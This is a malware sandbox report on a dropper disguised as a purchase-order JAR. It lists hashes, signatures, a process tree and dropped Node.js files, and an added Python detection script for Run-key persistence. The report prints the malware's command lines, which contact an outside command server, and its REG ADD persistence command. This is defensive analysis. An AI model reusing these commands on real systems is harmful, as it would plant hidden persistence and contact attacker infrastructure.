Analysis
max time kernel: 134s
max time network: 147s
platform: windows10_x64
resource: win10
submitted: 30-06-2020 13:49
Static task: static1
Behavioral task: behavioral1
  Sample: purchase_order_june2020.jar
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: purchase_order_june2020.jar
  Resource: win10
General
Target: purchase_order_june2020.jar
Size: 12KB
MD5: 072a7dde70bb530505d079fa0e58f5b3
SHA1: 17ecf45e01685a6eb6f664984774f0e393136962
SHA256: d19e6201d033366ca89123177f5e53904f06f043dca06d162578920e064e34f2
SHA512: bbce409bcb919193c0a00699f154246b7d1f46ab0bd6014b06ab0bbb29a2a45563897ee41d53f20efd7e1360ccce3f637bb77814d18b492477d201d3101e90dd
Malware Config
Signatures
- Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  12    wtfismyip.com
  11    wtfismyip.com
- Suspicious use of WriteProcessMemory (8 IoCs)
Processes: java.exe, node.exe, cmd.exe
  description                         pid   process   target process
  PID 716 wrote to memory of 3804     716   java.exe  node.exe
  PID 716 wrote to memory of 3804     716   java.exe  node.exe
  PID 3804 wrote to memory of 3824    3804  node.exe  cmd.exe
  PID 3804 wrote to memory of 3824    3804  node.exe  cmd.exe
  PID 3824 wrote to memory of 3368    3824  cmd.exe   reg.exe
  PID 3824 wrote to memory of 3368    3824  cmd.exe   reg.exe
  PID 3804 wrote to memory of 3356    3804  node.exe  node.exe
  PID 3804 wrote to memory of 3356    3804  node.exe  node.exe
- Executes dropped EXE (2 IoCs)
Processes: node.exe, node.exe
  pid   process
  3804  node.exe
  3356  node.exe
- Loads dropped DLL (4 IoCs)
Processes: node.exe
  pid   process
  3356  node.exe
  3356  node.exe
  3356  node.exe
  3356  node.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes: node.exe
  pid   process
  3356  node.exe
  3356  node.exe
- Adds Run entry to start application (2 TTPs, 2 IoCs)
Processes: reg.exe
  Key created: \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (reg.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-335ea990 = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-335ea990.cmd\"" (reg.exe)
The persistence is per-user (HKCU Run, no elevation needed) and launches a .cmd dropped under the user's profile; cmd's /D switch disables AutoRun commands from the registry, so the launcher runs independently of any cmd AutoRun configuration.
- Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments. Note that Node.js itself reads exactly these values (~MHz and ProcessorNameString under HARDWARE\DESCRIPTION\System\CentralProcessor) through libuv whenever os.cpus() is called, so for a node.exe process this signature is weak evidence on its own; the dropped-EXE and Run-key signatures above carry the weight in this report.
Processes: node.exe
  description        ioc                                                                                        process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString      node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                          node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                     node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString      node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                          node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                     node.exe
Processes
Process tree (depth numbered as in the sandbox's tree; PIDs taken from the WriteProcessMemory table above):
1. C:\ProgramData\Oracle\Java\javapath\java.exe (PID 716)
   Command line: java -jar C:\Users\Admin\AppData\Local\Temp\purchase_order_june2020.jar
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 3804)
      Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:2642@qhub-subscription.store.qua.one --register-startup --central-base-url https://nanatools.ddns.net
      - Suspicious use of WriteProcessMemory
      - Executes dropped EXE
      3. C:\Windows\system32\cmd.exe (PID 3824)
         Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-335ea990" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-335ea990.cmd\"""
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\reg.exe (PID 3368)
            Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-335ea990" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-335ea990.cmd\""
            - Adds Run entry to start application
      3. C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe (PID 3356)
         Command line: C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:2642@qhub-subscription.store.qua.one --register-startup --central-base-url https://nanatools.ddns.net
         - Executes dropped EXE
         - Loads dropped DLL
         - Suspicious behavior: EnumeratesProcesses
         - Checks processor information in registry
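The chain above (java.exe launching a dropped node.exe, which shells out through cmd.exe to reg.exe to write a Run value) is the part of this report worth turning into a hunt. The following Python is an added example and is not part of the sandbox report or of the sample: it rebuilds process ancestry from the WriteProcessMemory table, then flags Run-key writes on three indicators the report exhibits (the value launches a file under a user profile, the writer descends from a script or JVM interpreter, and the write was made with reg.exe). The event tuples are constructed from the report's tables; the regexes, the INTERPRETERS set and the finding format are this example's own choices.

```python
import re

# Constructed from the report's "Suspicious use of WriteProcessMemory" table:
# (parent pid, parent image, child pid, child image), duplicate rows collapsed.
PROCESS_EVENTS = [
    (716, "java.exe", 3804, "node.exe"),
    (3804, "node.exe", 3824, "cmd.exe"),
    (3824, "cmd.exe", 3368, "reg.exe"),
    (3804, "node.exe", 3356, "node.exe"),
]

# Constructed from the report's "Adds Run entry to start application" table:
# (pid, image, operation, key path, value data).
RUN_KEY = (r"\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000"
           r"\Software\Microsoft\Windows\CurrentVersion\Run")
REGISTRY_EVENTS = [
    (3368, "reg.exe", "Set value (str)", RUN_KEY + r"\qnodejs-335ea990",
     r'cmd /D /C "C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-335ea990.cmd"'),
]

# Any Run / RunOnce key, whatever hive prefix the sensor reports (HKCU, HKLM, \REGISTRY\USER\<SID>).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# A path under a user profile: writable without elevation, and where droppers land.
USER_PROFILE_RE = re.compile(r"[A-Za-z]:\\Users\\[^\\]+\\", re.I)
# Interpreters a Run-key writer should rarely descend from (assumption: tune for your estate).
INTERPRETERS = {"java.exe", "javaw.exe", "node.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "mshta.exe"}


def build_tree(events):
    """Return (parent_of, image_of) maps from parent/child process records."""
    parent_of, image_of = {}, {}
    for ppid, pimage, cpid, cimage in events:
        parent_of[cpid] = ppid
        image_of[cpid] = cimage
        image_of.setdefault(ppid, pimage)
    return parent_of, image_of


def ancestry(pid, parent_of, image_of):
    """Image names from the root ancestor down to pid, e.g. ['java.exe', 'node.exe', 'cmd.exe', 'reg.exe']."""
    chain, seen = [], set()
    while pid in image_of and pid not in seen:  # 'seen' guards against pid reuse creating a cycle
        seen.add(pid)
        chain.append(image_of[pid])
        pid = parent_of.get(pid)
    return chain[::-1]


def hunt_run_key_persistence(process_events, registry_events):
    """Flag Run-key writes that look like dropper persistence rather than an installer."""
    parent_of, image_of = build_tree(process_events)
    findings = []
    for pid, image, operation, key, data in registry_events:
        if not operation.lower().startswith("set value") or not RUN_KEY_RE.search(key):
            continue
        chain = ancestry(pid, parent_of, image_of)
        reasons = []
        if USER_PROFILE_RE.search(data):
            reasons.append("run value launches a file under a user profile")
        if INTERPRETERS & set(chain):
            reasons.append("writer descends from an interpreter: " + " -> ".join(chain))
        if image.lower() == "reg.exe":
            reasons.append("written with reg.exe instead of by the application itself")
        if reasons:
            findings.append({
                "pid": pid,
                "value_name": key.rsplit("\\", 1)[-1],
                "command": data,
                "chain": chain,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in hunt_run_key_persistence(PROCESS_EVENTS, REGISTRY_EVENTS):
        print(f"{f['value_name']} <- {' -> '.join(f['chain'])}")
        for reason in f["reasons"]:
            print("  *", reason)
```

On this report's data the single Run write scores on all three indicators with the chain java.exe -> node.exe -> cmd.exe -> reg.exe. A Run value written by an installer under Program Files from a services.exe -> msiexec.exe chain scores on none and is not reported, which is the point of combining the indicators rather than alerting on every Run-key write.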
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ffi-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\native-reg\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\ref-napi\prebuilds\win32-x64\node.napi.node
- \Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\node_modules\sqlite3\lib\binding\node-v79-win32-x64\node_sqlite3.node
- memory/3356-118-0x0000000000000000-mapping.dmp
- memory/3356-120-0x000001BE27B40000-0x000001BE27B41000-memory.dmp (Filesize: 4KB)
- memory/3368-117-0x0000000000000000-mapping.dmp
- memory/3804-112-0x0000000000000000-mapping.dmp
- memory/3804-114-0x0000023BE3380000-0x0000023BE3381000-memory.dmp (Filesize: 4KB)
- memory/3824-116-0x0000000000000000-mapping.dmp